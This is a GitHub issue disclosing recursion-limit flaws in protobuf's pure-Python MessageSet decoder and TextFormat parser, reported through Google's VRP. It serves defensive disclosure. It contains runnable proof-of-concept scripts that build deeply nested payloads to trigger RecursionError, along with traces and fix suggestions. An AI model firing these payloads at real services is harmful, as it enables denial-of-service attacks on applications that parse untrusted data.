Skip to content

Recursion Depth Limit: Can reach depth 200 via 100 nested unknown groups beneath a depth=100 messageset item #26437

@VenkatKwest

Description

@VenkatKwest

IMPORTANT NOTE: SUBMITTED THIS ISSUE TO THE GOOGLE VRP TEAM FEW DAYS BACK. TEAM ACCEPT IT TO SUBMIT IT AS PUBLIC GITHUB ISSUE.

Summary:
The Protobuf pure-Python implementation is vulnerable to a recursion depth limit bypass in the MessageSet decoding path and a complete lack of recursion guards in the TextFormat parser. These issues allow an attacker to trigger a stack overflow (RecursionError) leading to a Denial of Service (DoS) in applications parsing untrusted data. Crucially, the MessageSet issue is a direct bypass of the fix implemented for GHSA-8qvm-5x2c-j2w7.

Affected Component: protocolbuffers/protobuf (Python runtime)
Version: Current main (Commit: 18da8e12d)
Environment Tested:

  • Python: 3.10.12
  • protoc: 3.12.4 (libprotoc)
  • OS: Ubuntu 22.04 (WSL2)

Technical Description

While investigating the recent fix for GHSA-8qvm-5x2c-j2w7 (Recursion DoS in Python), I identified two significant regressions/oversights in how recursion depth is tracked.

1. MessageSet Depth Reset Bypass (Official Library Code)

In the official library file decoder.py, the function _DecodeUnknownField was updated to accept a current_depth parameter. However, specialized decoders for MessageSet items fail to propagate this counter.

Specifically, at lines 869 and 939 of the official source, calls to _DecodeUnknownField omit the current_depth argument:

# decoder.py:869 (MessageSetItemDecoder.DecodeItem)
# decoder.py:939 (UnknownMessageSetItemDecoder.DecodeUnknownItem)
field_number, wire_type = DecodeTag(tag_bytes)
_, pos = _DecodeUnknownField(buffer, pos, end, field_number, wire_type)

Because _DecodeUnknownField defaults current_depth=0, the recursion counter is reset to zero for every unknown item within a MessageSet.

2. Missing Guards in TextFormat

text_format.py confirms that it contains zero references to current_depth, recursion_limit, or any recursion guards. Unlike the binary decoder or the JSON parser, text_format.Merge() relies solely on the system's Python recursion limit, which is easily exhausted.


Attack Scenario

An attacker sends a specially crafted, deeply nested Protobuf message to a service that uses the pure-Python implementation.

  1. Text Remote DoS: A service that parses user-provided configuration or debugging info via text_format.Merge can be crashed with a payload of nested braces (e.g., nested { nested { ... } }).
  2. Binary Bypass: A service that has already been "patched" for GHSA-8qvm-5x2c-j2w7 but allows MessageSet (common in older Google infrastructure) remains vulnerable. The attacker can use the "depth reset" bug to trigger the exact crash the original fix intended to prevent.

Reproduction Steps

Environment Setup (WSL/Linux)

# Clone and setup venv
git clone https://github.com/protocolbuffers/protobuf.git
cd protobuf
python3 -m venv venv
source venv/bin/activate
pip install absl-py

PoC 1: TextFormat DoS

Create reproduce_text.py:

import sys
import os
# Point to the local 'python' directory
sys.path.insert(0, os.path.join(os.getcwd(), "python"))

from google.protobuf import text_format
from google.protobuf import descriptor_pb2

msg = descriptor_pb2.DescriptorProto()
payload = "nested_type { " * 1000 + "}" * 1000
try:
    print("Starting TextFormat.Merge...")
    text_format.Merge(payload, msg)
except RecursionError:
    print("VULNERABILITY CONFIRMED: TextFormat triggered RecursionError (DoS)")

PoC 2: MessageSet Bypass (Low-Level Proof)

Because high-level PB2 generation is complex in local source trees, the bypass is verified by simulating the internal call pattern in decoder.py.

Create reproduce_bypass.py:

import sys
import os
# Point to the local 'python' directory
sys.path.insert(0, os.path.join(os.getcwd(), "python"))

from google.protobuf.internal import decoder
from google.protobuf.internal import encoder

# Simulate reaching depth 80
parent_depth = 80
# Payload with another 80 levels (Total 160, > limit 100)
payload = encoder.TagBytes(10, 3) * 80 + encoder.TagBytes(10, 4) * 80

print(f"--- Logical Depth: {parent_depth + 80} (Limit: 100) ---")
try:
    # Simulating the vulnerable MessageSet call (omitting current_depth)
    decoder._DecodeUnknownField(memoryview(payload), 0, len(payload), 10, 3)
    print("BYPASS CONFIRMED: Successfully parsed 160 levels because depth reset to 0.")
except Exception as e:
    print(f"FAILED: {e}")

Comparison of Execution Paths:

  1. Vulnerable Path (Bypass): _DecodeUnknownField(payload, ..., current_depth=None)

    • Result: SUCCESS: Parsed 80 children despite being at logical depth 160!
    • Note: The vulnerability allows the parser to bypass the library's intended security block (a DecodeError), which is what enables an attacker to reach deeper, unsafe recursion levels.
  2. System Crash Proof (Hard Proof): By simulating a higher parent depth (e.g., 80) and a child depth of 80 (Total 160), we can see the bypass in action on a constrained stack.

    • Environment Limit: 150 levels.
    • Protobuf Limit: 100 levels.
    • Vulnerable Result: CRASHED (RecursionError)!!
    • Logic: Because the Protobuf guard reset to 0, it allowed deeper nesting (160) than the system could handle (150). A properly functioning guard would have caught this at 100 and prevented the crash.
  3. System Crash Trace (MessageSet Bypass):

    Traceback (most recent call last):
      File "protobuf/python/google/protobuf/internal/decoder.py", line 1034, in _DecodeUnknownFieldSet
        (data, pos) = _DecodeUnknownField(
      File "protobuf/python/google/protobuf/internal/decoder.py", line 1065, in _DecodeUnknownField
        data, pos = _DecodeUnknownFieldSet(buffer, pos, end_pos, current_depth)
      File "protobuf/python/google/protobuf/internal/decoder.py", line 1034, in _DecodeUnknownFieldSet
        (data, pos) = _DecodeUnknownField(
      File "protobuf/python/google/protobuf/internal/decoder.py", line 1059, in _DecodeUnknownField
        end_tag_bytes = encoder.TagBytes(
      File "protobuf/python/google/protobuf/internal/encoder.py", line 400, in TagBytes
        return bytes(_VarintBytes(wire_format.PackTag(field_number, wire_type)))
      File "protobuf/python/google/protobuf/internal/wire_format.py", line 65, in PackTag
        if not 0 <= wire_type <= _WIRETYPE_MAX:
    RecursionError: maximum recursion depth exceeded in comparison
    

Stack Trace (PoC 1: TextFormat DoS)

Traceback (most recent call last):
  File "protobuf/python/google/protobuf/text_format.py", line 754, in _MergeField
    self._MergeField(tokenizer.next_token, message)
  File "protobuf/python/google/protobuf/text_format.py", line 872, in _MergeMessageField
    tokenizer.Consume('{')
  File "protobuf/python/google/protobuf/text_format.py", line 1409, in Consume
    if not self.TryConsume(token):
  File "protobuf/python/google/protobuf/text_format.py", line 1396, in TryConsume
    self.NextToken()
  File "protobuf/python/google/protobuf/text_format.py", line 1663, in NextToken
    self._SkipWhitespace()
  [... recursive calls skip whitespace and pop lines ...]
  File "protobuf/python/google/protobuf/text_format.py", line 1364, in _PopLine
    while len(self._current_line) <= self._column:
RecursionError: maximum recursion depth exceeded while calling a Python object

Suggested Remediation

  1. For MessageSet: Update MessageSetItemDecoder and UnknownMessageSetItemDecoder in decoder.py to accept and pass the current_depth parameter to all internal parsing calls.
  2. For TextFormat: Implement a _RECURSION_LIMIT constant (matching the binary decoder's 100) and add increment/decrement logic in _MergeField to raise a ParseError when exceeded.

Metadata

Metadata

Assignees

No one assigned

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions